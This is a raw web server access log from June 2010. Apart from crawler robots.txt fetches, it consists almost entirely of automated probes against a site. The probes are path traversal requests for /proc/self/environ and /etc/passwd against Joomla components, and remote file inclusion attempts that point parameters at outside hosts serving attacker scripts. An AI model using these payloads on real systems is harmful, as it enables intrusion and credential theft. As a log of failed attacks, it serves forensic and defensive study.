62.44.82.61 - - [17/Jun/2010:06:13:07 -0700] "GET /*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "elfagr.net"
67.218.116.168 - - [17/Jun/2010:06:14:28 -0700] "GET /robots.txt HTTP/1.1" 200 37 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.elfagr.net"
67.228.85.91 - - [17/Jun/2010:06:15:06 -0700] "GET /logs/access.log//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.elfagr.net"
219.240.36.36 - - [17/Jun/2010:06:15:18 -0700] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "elfagr.net"
219.240.36.36 - - [17/Jun/2010:06:15:30 -0700] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "elfagr.net"
219.240.36.36 - - [17/Jun/2010:06:16:31 -0700] "GET /logs/access.log/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "elfagr.net"
219.240.36.36 - - [17/Jun/2010:06:16:22 -0700] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "elfagr.net"
219.240.36.36 - - [17/Jun/2010:06:16:22 -0700] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "elfagr.net"
219.240.36.36 - - [17/Jun/2010:06:17:03 -0700] "GET /logs/access.log/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "elfagr.net"
219.240.36.36 - - [17/Jun/2010:06:17:03 -0700] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "elfagr.net"
219.240.36.36 - - [17/Jun/2010:06:17:14 -0700] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "elfagr.net"
212.59.6.16 - - [17/Jun/2010:06:17:32 -0700] "GET /index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
212.59.6.16 - - [17/Jun/2010:06:17:41 -0700] "GET /index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
67.218.116.164 - - [17/Jun/2010:06:18:24 -0700] "GET /robots.txt HTTP/1.1" 200 37 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.elfagr.net"
67.228.85.91 - - [17/Jun/2010:06:19:17 -0700] "GET /logs/access_091203.log//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.elfagr.net"
67.228.85.91 - - [17/Jun/2010:06:19:07 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.elfagr.net"
67.228.85.91 - - [17/Jun/2010:06:19:17 -0700] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.elfagr.net"
83.16.100.218 - - [17/Jun/2010:06:19:27 -0700] "GET //administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.apbs.pl/images/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
83.16.100.218 - - [17/Jun/2010:06:19:37 -0700] "GET /logs///administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.apbs.pl/images/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
83.16.100.218 - - [17/Jun/2010:06:19:27 -0700] "GET /logs/access.log///administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.apbs.pl/images/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
216.129.119.41 - - [17/Jun/2010:06:20:56 -0700] "GET /robots.txt HTTP/1.1" 200 37 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.elfagr.net"
83.16.100.218 - - [17/Jun/2010:06:21:34 -0700] "GET //administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.apbs.pl/images/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
83.16.100.218 - - [17/Jun/2010:06:21:24 -0700] "GET /logs///administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.apbs.pl/images/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
83.16.100.218 - - [17/Jun/2010:06:21:24 -0700] "GET /logs/access_091029.log///administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.apbs.pl/images/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
67.228.85.91 - - [17/Jun/2010:06:21:47 -0700] "GET /logs/access.log//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.elfagr.net"
67.218.116.170 - - [17/Jun/2010:06:25:45 -0700] "GET /robots.txt HTTP/1.1" 200 37 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.elfagr.net"
67.218.116.162 - - [17/Jun/2010:06:27:47 -0700] "GET /robots.txt HTTP/1.1" 200 37 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.elfagr.net"
83.16.100.218 - - [17/Jun/2010:06:33:59 -0700] "GET /logs///administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.apbs.pl/images/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
83.16.100.218 - - [17/Jun/2010:06:33:59 -0700] "GET //administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.apbs.pl/images/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
83.16.100.218 - - [17/Jun/2010:06:34:09 -0700] "GET /logs/access.log%20%20///administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.apbs.pl/images/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
212.59.6.16 - - [17/Jun/2010:06:36:32 -0700] "GET /logs/access.log//index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
212.59.6.16 - - [17/Jun/2010:06:36:42 -0700] "GET /logs/access.log//index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
212.59.6.16 - - [17/Jun/2010:06:36:32 -0700] "GET /index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
212.59.6.16 - - [17/Jun/2010:06:36:42 -0700] "GET /index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
212.59.6.16 - - [17/Jun/2010:06:36:32 -0700] "GET /logs//index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
212.59.6.16 - - [17/Jun/2010:06:36:32 -0700] "GET /logs//index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
83.16.100.218 - - [17/Jun/2010:06:36:49 -0700] "GET //administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.apbs.pl/images/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
83.16.100.218 - - [17/Jun/2010:06:36:49 -0700] "GET /logs///administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.apbs.pl/images/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
83.16.100.218 - - [17/Jun/2010:06:36:49 -0700] "GET /logs/access_091029.log%20%20///administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.apbs.pl/images/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
219.240.36.36 - - [17/Jun/2010:06:41:30 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "elfagr.net"
219.240.36.36 - - [17/Jun/2010:06:41:36 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "elfagr.net"
67.228.62.66 - - [17/Jun/2010:06:42:17 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
67.228.62.66 - - [17/Jun/2010:06:42:07 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
67.228.62.66 - - [17/Jun/2010:06:42:08 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
212.59.6.16 - - [17/Jun/2010:06:42:20 -0700] "GET /logs/access.log//index.php?option=com_agora&task=profile&page=avatars&action=http://www.ducklus.nl/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
212.59.6.16 - - [17/Jun/2010:06:42:20 -0700] "GET /index.php?option=com_agora&task=profile&page=avatars&action=http://www.ducklus.nl/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
212.59.6.16 - - [17/Jun/2010:06:42:20 -0700] "GET /logs/access.log//index.php?option=com_agora&task=profile&page=avatars&action=http://www.ducklus.nl/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
212.59.6.16 - - [17/Jun/2010:06:42:30 -0700] "GET /index.php?option=com_agora&task=profile&page=avatars&action=http://www.ducklus.nl/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
212.59.6.16 - - [17/Jun/2010:06:42:20 -0700] "GET /logs//index.php?option=com_agora&task=profile&page=avatars&action=http://www.ducklus.nl/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
212.59.6.16 - - [17/Jun/2010:06:42:30 -0700] "GET /logs//index.php?option=com_agora&task=profile&page=avatars&action=http://www.ducklus.nl/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
64.34.165.224 - - [17/Jun/2010:06:43:41 -0700] "GET /index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
64.34.165.224 - - [17/Jun/2010:06:43:54 -0700] "GET /index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
219.240.36.36 - - [17/Jun/2010:06:44:30 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "elfagr.net"
219.240.36.36 - - [17/Jun/2010:06:44:48 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "elfagr.net"
64.34.165.224 - - [17/Jun/2010:06:45:07 -0700] "GET /logs/access.log//index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
64.34.165.224 - - [17/Jun/2010:06:45:17 -0700] "GET /index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
64.34.165.224 - - [17/Jun/2010:06:45:08 -0700] "GET /logs//index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
213.171.37.206 - - [17/Jun/2010:06:51:48 -0700] "GET /mambots/errors.php?error=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.elfagr.net"
213.171.37.206 - - [17/Jun/2010:06:51:38 -0700] "GET /logs/access_091203.log/mambots/errors.php?error=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.elfagr.net"
213.171.37.206 - - [17/Jun/2010:06:51:38 -0700] "GET /logs/access_091029.log/mambots/errors.php?error=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.elfagr.net"
213.171.37.206 - - [17/Jun/2010:06:51:48 -0700] "GET /logs/mambots/errors.php?error=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.elfagr.net"
219.240.36.36 - - [17/Jun/2010:06:54:04 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "elfagr.net"
219.240.36.36 - - [17/Jun/2010:06:53:55 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "elfagr.net"
64.34.165.224 - - [17/Jun/2010:06:55:33 -0700] "GET /logs/access.log//index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
64.34.165.224 - - [17/Jun/2010:06:55:33 -0700] "GET /index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
64.34.165.224 - - [17/Jun/2010:06:55:23 -0700] "GET /logs//index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
64.34.165.224 - - [17/Jun/2010:06:55:36 -0700] "GET /logs/access.log//index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
64.34.165.224 - - [17/Jun/2010:06:55:26 -0700] "GET /index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
64.34.165.224 - - [17/Jun/2010:06:55:36 -0700] "GET /logs//index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
67.205.85.5 - - [17/Jun/2010:06:56:04 -0700] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://www.linkeate.pe/old/idxx.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
67.205.85.5 - - [17/Jun/2010:06:56:14 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.linkeate.pe/old/idxx.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
67.205.85.5 - - [17/Jun/2010:06:56:04 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://www.linkeate.pe/old/idxx.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
67.205.85.5 - - [17/Jun/2010:06:56:19 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.linkeate.pe/old/idxx.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
67.205.85.5 - - [17/Jun/2010:06:56:09 -0700] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://www.linkeate.pe/old/idxx.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
67.205.85.5 - - [17/Jun/2010:06:56:09 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://www.linkeate.pe/old/idxx.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
83.16.100.218 - - [17/Jun/2010:06:57:05 -0700] "GET //administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.apbs.pl/images/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
83.16.100.218 - - [17/Jun/2010:06:57:15 -0700] "GET /logs///administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.apbs.pl/images/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
83.16.100.218 - - [17/Jun/2010:06:57:15 -0700] "GET /logs/access.log%20%20///administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.apbs.pl/images/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
67.205.85.5 - - [17/Jun/2010:06:57:36 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://www.linkeate.pe/old/idxx.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
67.205.85.5 - - [17/Jun/2010:06:57:46 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.linkeate.pe/old/idxx.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
67.205.85.5 - - [17/Jun/2010:06:57:40 -0700] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://www.linkeate.pe/old/idxx.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
67.205.85.5 - - [17/Jun/2010:06:58:14 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://www.linkeate.pe/old/idxx.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
67.205.85.5 - - [17/Jun/2010:06:58:18 -0700] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://www.linkeate.pe/old/idxx.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
67.205.85.5 - - [17/Jun/2010:06:58:27 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.linkeate.pe/old/idxx.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
212.227.29.197 - - [17/Jun/2010:07:01:32 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
67.205.85.5 - - [17/Jun/2010:07:04:43 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://www.linkeate.pe/old/idxx.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
67.205.85.5 - - [17/Jun/2010:07:04:34 -0700] "GET /logs/access.log%20%20//skin/zero_vote/ask_password.php?dir=http://www.linkeate.pe/old/idxx.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
67.205.85.5 - - [17/Jun/2010:07:04:34 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.linkeate.pe/old/idxx.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
67.205.85.5 - - [17/Jun/2010:07:05:29 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://www.linkeate.pe/old/idxx.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
67.205.85.5 - - [17/Jun/2010:07:05:29 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.linkeate.pe/old/idxx.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
67.205.85.5 - - [17/Jun/2010:07:05:38 -0700] "GET /logs/access.log%20%20//skin/zero_vote/ask_password.php?dir=http://www.linkeate.pe/old/idxx.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
212.227.29.197 - - [17/Jun/2010:07:05:33 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
94.76.254.55 - - [17/Jun/2010:07:13:23 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "elfagr.net"
174.37.143.198 - - [17/Jun/2010:07:13:42 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
174.37.143.198 - - [17/Jun/2010:07:13:38 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
174.37.143.198 - - [17/Jun/2010:07:13:48 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
94.76.254.55 - - [17/Jun/2010:07:14:02 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "elfagr.net"
93.158.149.32 - - [17/Jun/2010:07:15:43 -0700] "GET /logs/access_091126.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.elfagr.net"
94.76.254.55 - - [17/Jun/2010:07:15:41 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "elfagr.net"
94.76.254.55 - - [17/Jun/2010:07:15:41 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "elfagr.net"
94.76.254.55 - - [17/Jun/2010:07:15:41 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "elfagr.net"
110.45.144.106 - - [17/Jun/2010:07:16:38 -0700] "GET /logs/access.log//index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "elfagr.net"
110.45.144.106 - - [17/Jun/2010:07:16:44 -0700] "GET /index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "elfagr.net"
174.37.143.198 - - [17/Jun/2010:07:16:59 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
174.37.143.198 - - [17/Jun/2010:07:16:59 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
174.37.143.198 - - [17/Jun/2010:07:16:50 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
110.45.144.106 - - [17/Jun/2010:07:16:50 -0700] "GET /logs//index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "elfagr.net"
174.37.143.198 - - [17/Jun/2010:07:16:52 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
174.37.143.198 - - [17/Jun/2010:07:16:52 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
174.37.143.198 - - [17/Jun/2010:07:16:52 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
202.191.112.37 - - [17/Jun/2010:07:17:04 -0700] "GET /logs/index.php/?option=com_sectionex&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.elfagr.net"
202.191.112.37 - - [17/Jun/2010:07:16:54 -0700] "GET /index.php/?option=com_sectionex&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.elfagr.net"
174.37.143.198 - - [17/Jun/2010:07:17:01 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
174.37.143.198 - - [17/Jun/2010:07:17:11 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
174.37.143.198 - - [17/Jun/2010:07:17:02 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
195.190.166.35 - - [17/Jun/2010:07:18:19 -0700] "GET /mambots/errors.php?error=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "elfagr.net"
195.190.166.35 - - [17/Jun/2010:07:18:19 -0700] "GET /logs/mambots/errors.php?error=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "elfagr.net"
195.190.166.35 - - [17/Jun/2010:07:18:19 -0700] "GET /logs/access.log/mambots/errors.php?error=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "elfagr.net"
110.45.144.106 - - [17/Jun/2010:07:18:23 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "elfagr.net"
110.45.144.106 - - [17/Jun/2010:07:18:36 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "elfagr.net"
83.16.100.218 - - [17/Jun/2010:07:20:09 -0700] "GET /logs/access.log///administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.apbs.pl/images/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
110.45.144.106 - - [17/Jun/2010:07:22:02 -0700] "GET /index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "elfagr.net"
110.45.144.106 - - [17/Jun/2010:07:22:03 -0700] "GET /index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "elfagr.net"
110.45.144.106 - - [17/Jun/2010:07:23:00 -0700] "GET /logs/access.log//index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "elfagr.net"
110.45.144.106 - - [17/Jun/2010:07:23:06 -0700] "GET /index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "elfagr.net"
110.45.144.106 - - [17/Jun/2010:07:23:11 -0700] "GET /logs//index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "elfagr.net"
110.45.144.106 - - [17/Jun/2010:07:23:30 -0700] "GET /index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "elfagr.net"
